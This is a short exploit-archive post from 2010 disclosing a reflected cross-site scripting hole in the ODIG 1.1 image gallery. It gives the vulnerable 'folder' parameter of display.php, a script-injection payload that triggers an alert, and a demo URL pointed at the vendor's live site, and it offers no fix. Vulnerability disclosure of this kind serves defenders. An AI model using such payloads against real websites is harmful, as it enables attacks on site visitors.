ODIG 1.1 Obsession-Design Image-Gallery Cross Site Scripting

Posted on 21 March 2010
============================================================
ODIG 1.1 Obsession-Design Image-Gallery Cross Site Scripting
============================================================


#########################################
## ODIG - Obsession-Design Image-Gallery Cross site scripting ( XSS )
##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 2 januari, 2010 ##
#########################################

[ Software Information ]

[+] Vendor : http://obsession-design.de/scripte/odig/
[+] Download : http://obsession-design.de/ch_counter/getfile.php?id=10
[+] version : 1.1
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#########################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/odig/display.php?folder=[INDONESIANCODER]

[ EXPLOIT ]

/>"><script>alert(123456789)</script>

[ DEMO ]

http://obsession-design.de/demos/odig/display.php?folder=/>"><script>alert(
123456789)</script>


[ FIX ]

dunno :">


#########################################


# Inj3ct0r.com [2010-03-21]
TOP
Malware :

Last 20
Exploits :

Last 20